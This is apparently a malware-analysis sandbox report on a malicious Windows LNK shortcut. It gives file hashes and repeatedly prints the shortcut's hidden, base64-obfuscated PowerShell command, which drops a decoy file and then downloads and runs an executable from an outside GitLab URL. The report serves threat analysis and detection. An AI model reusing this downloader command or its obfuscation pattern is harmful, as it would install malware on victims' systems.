Malicious

64ff7bfcea29963681fa0017f3811983

LNK File
|
MD5: 64ff7bfcea29963681fa0017f3811983
|
Size: 61.61 KB
|
application/x-ms-shortcut

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	64ff7bfcea29963681fa0017f3811983
Sha1	2f138f18d57a8f5633b952ea5abd6074459bdae0
Sha256	1ba43b5fc228be721cb57394e2d0999ddbbf34d0cb4c00998bce241eb41c546a
Sha384	025f943765c6e7b96f26c83fa63fe5af81cc36ec05efd52f69ae28ff9e538b745860dc0b2c653c54d4b4007122f6580b
Sha512	152fe0973515c8e61856cb4eed8c531e0ae3a3330d3ca3b6ccd671fd86e652fe3d92a68f1d88e05b8188cb43f6b14967160d3af3b2112d299b031f967f547056
SSDeep	1536:jafW6pTEZ43eXLsOqbDmm/JG/W0IstFBWIor:jeW6pTE+OZyDb/JG/iSFBWIor
TLSH	DD53F11609A1836ED571CC71B9C526094A73F8AAEB31EB29484E66434FC3C3E351D73D

File Structure

Artefacts

Name0	Value
LNK: Command Execution	powershell.exe -WindowStyle hidden -NoExit -Command "$UGL9185A = 'gWe6HFvlgu4gfcfFm4dsTmBbjN1ZEJEWkdGYkI1RmRZQXprR2NEZDRTZXQtQ29udGVudCAkZW52OlRFTVBcTG9hZGluZy4uICdSZXZpZXcnO1N0YXJ0LVByb2Nlc3MgJGVudjpURU1QXExvYWRpbmcuLjtpd3IgLVVyaSBodHRwczovL2dpdGxhYi5jb20vLS9wcm9qZWN0Lzc2ODM2MzkxL3VwbG9hZHMvMWY3MWM3OWVjNGI5YjA1NGY2ZDY4ZDM0YTZmNDMxMmQvb3N2MzIuZXhlIC1PdXRGaWxlICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtFeGl0';$XY2IYW3 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UGL9185A.Substring(23)));Invoke-Expression -Command $XY2IYW3.Substring(23);Exit"
Deobfuscated PowerShell	-windowstyle "hidden" -NoExit -Command "$UGL9185A = 'gWe6HFvlgu4gfcfFm4dsTmBbjN1ZEJEWkdGYkI1RmRZQXprR2NEZDRTZXQtQ29udGVudCAkZW52OlRFTVBcTG9hZGluZy4uICdSZXZpZXcnO1N0YXJ0LVByb2Nlc3MgJGVudjpURU1QXExvYWRpbmcuLjtpd3IgLVVyaSBodHRwczovL2dpdGxhYi5jb20vLS9wcm9qZWN0Lzc2ODM2MzkxL3VwbG9hZHMvMWY3MWM3OWVjNGI5YjA1NGY2ZDY4ZDM0YTZmNDMxMmQvb3N2MzIuZXhlIC1PdXRGaWxlICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtFeGl0';$XY2IYW3 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UGL9185A.Substring(23)));Invoke-Expression -Command $XY2IYW3.Substring(23);Exit"
Deobfuscated PowerShell	-windowstyle "hidden" -NoExit -Command "$UGL9185A = 'gWe6HFvlgu4gfcfFm4dsTmBbjN1ZEJEWkdGYkI1RmRZQXprR2NEZDRTZXQtQ29udGVudCAkZW52OlRFTVBcTG9hZGluZy4uICdSZXZpZXcnO1N0YXJ0LVByb2Nlc3MgJGVudjpURU1QXExvYWRpbmcuLjtpd3IgLVVyaSBodHRwczovL2dpdGxhYi5jb20vLS9wcm9qZWN0Lzc2ODM2MzkxL3VwbG9hZHMvMWY3MWM3OWVjNGI5YjA1NGY2ZDY4ZDM0YTZmNDMxMmQvb3N2MzIuZXhlIC1PdXRGaWxlICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtFeGl0';$XY2IYW3 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UGL9185A.Substring(23)));Invoke-Expression -Command $XY2IYW3.Substring(23);Exit"

64ff7bfcea29963681fa0017f3811983 (61.61 KB)

File Structure

Characteristics

No malware configuration were found at this point.

Artefacts

Name0	Value	Location
LNK: Command Execution	powershell.exe -WindowStyle hidden -NoExit -Command "$UGL9185A = 'gWe6HFvlgu4gfcfFm4dsTmBbjN1ZEJEWkdGYkI1RmRZQXprR2NEZDRTZXQtQ29udGVudCAkZW52OlRFTVBcTG9hZGluZy4uICdSZXZpZXcnO1N0YXJ0LVByb2Nlc3MgJGVudjpURU1QXExvYWRpbmcuLjtpd3IgLVVyaSBodHRwczovL2dpdGxhYi5jb20vLS9wcm9qZWN0Lzc2ODM2MzkxL3VwbG9hZHMvMWY3MWM3OWVjNGI5YjA1NGY2ZDY4ZDM0YTZmNDMxMmQvb3N2MzIuZXhlIC1PdXRGaWxlICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtFeGl0';$XY2IYW3 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UGL9185A.Substring(23)));Invoke-Expression -Command $XY2IYW3.Substring(23);Exit" Malicious	64ff7bfcea29963681fa0017f3811983
Deobfuscated PowerShell	-windowstyle "hidden" -NoExit -Command "$UGL9185A = 'gWe6HFvlgu4gfcfFm4dsTmBbjN1ZEJEWkdGYkI1RmRZQXprR2NEZDRTZXQtQ29udGVudCAkZW52OlRFTVBcTG9hZGluZy4uICdSZXZpZXcnO1N0YXJ0LVByb2Nlc3MgJGVudjpURU1QXExvYWRpbmcuLjtpd3IgLVVyaSBodHRwczovL2dpdGxhYi5jb20vLS9wcm9qZWN0Lzc2ODM2MzkxL3VwbG9hZHMvMWY3MWM3OWVjNGI5YjA1NGY2ZDY4ZDM0YTZmNDMxMmQvb3N2MzIuZXhlIC1PdXRGaWxlICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtFeGl0';$XY2IYW3 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UGL9185A.Substring(23)));Invoke-Expression -Command $XY2IYW3.Substring(23);Exit" Malicious	64ff7bfcea29963681fa0017f3811983 > LNK CommandLine
Deobfuscated PowerShell	-windowstyle "hidden" -NoExit -Command "$UGL9185A = 'gWe6HFvlgu4gfcfFm4dsTmBbjN1ZEJEWkdGYkI1RmRZQXprR2NEZDRTZXQtQ29udGVudCAkZW52OlRFTVBcTG9hZGluZy4uICdSZXZpZXcnO1N0YXJ0LVByb2Nlc3MgJGVudjpURU1QXExvYWRpbmcuLjtpd3IgLVVyaSBodHRwczovL2dpdGxhYi5jb20vLS9wcm9qZWN0Lzc2ODM2MzkxL3VwbG9hZHMvMWY3MWM3OWVjNGI5YjA1NGY2ZDY4ZDM0YTZmNDMxMmQvb3N2MzIuZXhlIC1PdXRGaWxlICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtFeGl0';$XY2IYW3 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UGL9185A.Substring(23)));Invoke-Expression -Command $XY2IYW3.Substring(23);Exit" Malicious	64ff7bfcea29963681fa0017f3811983 > LNK CommandLine > [Deobfuscated PS]

You must be signed in to post a comment.

An error has occurred. This application may no longer respond until reloaded. Reload 🗙